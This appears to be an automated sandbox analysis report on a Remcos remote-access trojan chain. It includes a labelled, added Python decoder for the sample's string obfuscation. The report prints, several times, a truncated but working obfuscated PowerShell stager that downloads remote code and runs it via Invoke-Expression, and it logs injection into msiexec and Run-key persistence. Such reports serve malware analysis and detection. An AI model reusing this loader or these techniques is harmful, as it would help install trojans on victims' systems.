              Source: Binary string: msiexec.pdbGCTL source: msiexec.exe, 00000008.00000003.2717481925.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2612607332.0000000007E10000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2244688991.00000263E8771000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2248116940.00000263E8971000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdbvs source: powershell.exe, 00000004.00000002.2606853141.0000000006DC2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb52G source: powershell.exe, 00000004.00000002.2606853141.0000000006D81000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.2606853141.0000000006D81000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: ShellExecute("powershell", ""echo $Sarcosome; function Relationsdat", "", "", "0");
              Source: Yara match | File source: 00000004.00000002.2613657246.000000000BA9B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.2613266468.00000000080C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.2599993582.000000000549C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000002.2406245717.0000018221C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Inquietudes)$gLoBal:ApraxIa226 = [SysTem.TEXt.enCoDinG]::AsciI.getstring($puistIe)$GlOBAl:metaLoPh=$aPraXiA226.substrINg($toXiheMia,$hOubArA186)<#Sekstendedelsnoderne Centralkommunes
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Paadragendes $Guaiacs $Afpolitiseret), (Foran @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Abscessen = [AppDomain]::CurrentDomain.GetAssemblies()$global
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Rubs)), $fremadrettede).DefineDynamicModule($Inspektrice, $false).DefineType($straffene, $standardvrdi, [System.MulticastDelegate])$Me
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Inquietudes)$gLoBal:ApraxIa226 = [SysTem.TEXt.enCoDinG]::AsciI.getstring($puistIe)$GlOBAl:metaLoPh=$aPraXiA226.substrINg($toXiheMia,$hOubArA186)<#Sekstendedelsnoderne Centralkommunes
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cer
              Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cer
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cer
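Added example, not part of the Joe Sandbox report and not code from the sample: a Python decoder for the string obfuscation in the PowerShell command line recorded above (the same command line is recorded for the 64-bit host and for the 32-bit host). The script's Relationsdatabasemodellen function starts at index 4 and keeps every fifth character, so each real character sits behind four junk characters; Woodranger is `.($Ludgate)`, and $Ludgate decodes to iEX, so every Woodranger call is an Invoke-Expression of decoded text. The encoded literals in the excerpt are copied from the command line above; the Python function and variable names and the excerpt boundaries are this example's own. Decoding the excerpt shows the stage forcing TLS 1.2 through [Net.ServicePointManager]::SecurityProtocol, building a Net.WebClient, setting a User-Agent header and reading its download URL from $statsretten. One caveat when decoding from this page rather than from the raw .vbs: the report's HTML rendering collapsed runs of spaces, so a literal that contained two adjacent spaces (the second half of $grounds, a browser User-Agent string) no longer lines up on the 5-character stride and is left out of the excerpt.

```python
"""Decoder for the string obfuscation used by the PowerShell stage above.

Relationsdatabasemodellen($s) starts at index 4 and appends every 5th character
until $s[$i] is $null (i.e. past the end of the string): each real character is
preceded by four junk characters, so the decoder is a slice. Woodranger($x) is
`.($Ludgate) ($x)`, and $Ludgate decodes to "iEX", so every Woodranger call is
Invoke-Expression on a decoded string.
"""
import re

# Excerpt of the command line above, in script order (copied literals, not
# sandbox output). The second half of $grounds (a browser User-Agent) is left
# out: the page's HTML rendering collapsed runs of spaces inside that literal,
# so it no longer decodes cleanly from the page text; decode it from the raw .vbs.
SCRIPT_EXCERPT = (
    r"$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';"
    r"$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';"
    r"$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';"
    r"$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';"
    r"$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';"
    r"$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';"
    r"$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';"
    r"$Bentjs=Relationsdatabasemodellen 'vilj>';"
    r"$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';"
    r"$Gushy='\Knapmagerens.Stu';"
    r"Woodranger (Relationsdatabasemodellen $Parodi);"
)

DECODER_NAME = "Relationsdatabasemodellen"
# $name=Relationsdatabasemodellen '...', $name+=Relationsdatabasemodellen '...', or a plain $name='...'
ASSIGNMENT = re.compile(r"(\$\w+)(\+?=)(" + DECODER_NAME + r" )?'([^']*)'")


def decode(encoded: str, start: int = 4, step: int = 5) -> str:
    """Equivalent of the script's do/until loop: keep s[4], s[9], s[14], ..."""
    return encoded[start::step]


def recover_variables(script: str) -> dict:
    """Replay the string assignments in order (honouring +=). Literals that went
    through the decoder are stored decoded; plain literals (such as $Parodi) are
    stored raw, exactly as the script keeps them until it decodes them later."""
    values = {}
    for name, op, via_decoder, literal in ASSIGNMENT.findall(script):
        piece = decode(literal) if via_decoder else literal
        values[name] = (values.get(name, "") + piece) if op == "+=" else piece
    return values


def deobfuscate(script: str) -> str:
    """Rewrite the script with every decoder call replaced by its plaintext and
    Woodranger renamed to the cmdlet it dispatches to."""
    values = recover_variables(script)
    out = re.sub(DECODER_NAME + r" '([^']*)'",
                 lambda m: "'" + decode(m.group(1)) + "'", script)
    # Relationsdatabasemodellen $Var decodes a literal that was stored raw earlier.
    out = re.sub(DECODER_NAME + r" (\$\w+)",
                 lambda m: "'" + decode(values.get(m.group(1), "")) + "'", out)
    if values.get("$Ludgate", "").lower() == "iex":
        out = out.replace("Woodranger", "Invoke-Expression")
    return out


if __name__ == "__main__":
    for name, value in recover_variables(SCRIPT_EXCERPT).items():
        print(f"{name:14} = {value!r}")
    print(deobfuscate(SCRIPT_EXCERPT))
```

Run it on the raw script body (everything after `echo $Sarcosome;`) to get the whole stage in clear text; a literal that the script stores raw and decodes later, like $Parodi, comes out at the point where the script decodes it. Because the decoder is a plain stride, any PowerShell logging that captures the command line (script block logging, a process-creation event) is enough to recover the URL and the WebClient usage without running the sample.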
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 10_2_00388ADC Sleep,LoadLibraryW,GetProcAddress
Source: remcos.exe.8.dr | Static PE information: section name: .didat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34645243 push eax; ret (2_2_00007FFD34645241)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD346451F5 push eax; ret (2_2_00007FFD34645241)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34642315 pushad ; iretd (2_2_00007FFD3464232D)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_027832D2 pushfd ; ret (4_2_027832E1)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_0278369D push ebx; iretd (4_2_027836DA)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_0278D75E pushad ; ret (4_2_0278D761)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_0278DA0C pushfd ; ret (4_2_0278DA0D)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_3_00CBFBBD push ecx; ret (8_3_00CBFBD0)
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 10_2_00389F2D push ecx; ret (10_2_00389F40)
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\ProgramData\Remcos\remcos.exe

Boot Survival

Source: C:\Windows\SysWOW64\msiexec.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (value: Rmc-BNP8PO)
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 10_2_00387DD0 StartServiceCtrlDispatcherW,GetLastError
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (80 events)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (74 events)
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX (2 events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5383
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4498
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5567
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4302
Source: C:\ProgramData\Remcos\remcos.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep (graph_10-3068)
Source: C:\ProgramData\Remcos\remcos.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_10-2965)
Source: C:\ProgramData\Remcos\remcos.exe | API coverage: 7.8 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5308 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7068 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: powershell.exe, 00000002.00000002.2413283912.000001822A1A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_02789219 LdrInitializeThunk
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 10_2_003859F2 GetLastError,RegQueryValueExW,RegCloseKey,GlobalFree,RegCreateKeyExW,RegSetValueExW,lstrlenW,RegSetValueExW,RegCloseKey,memset,OutputDebugStringW,SetLastError
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_3_00CBC073 mov eax, dword ptr fs:[00000030h]
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 10_2_003863E3 mov eax, dword ptr fs:[00000030h]
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 10_2_00389C10 SetUnhandledExceptionFilter
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 10_2_003895F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: Yara matchFile source: amsi64_3664.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 40C0000Jump to behavior
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cer
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
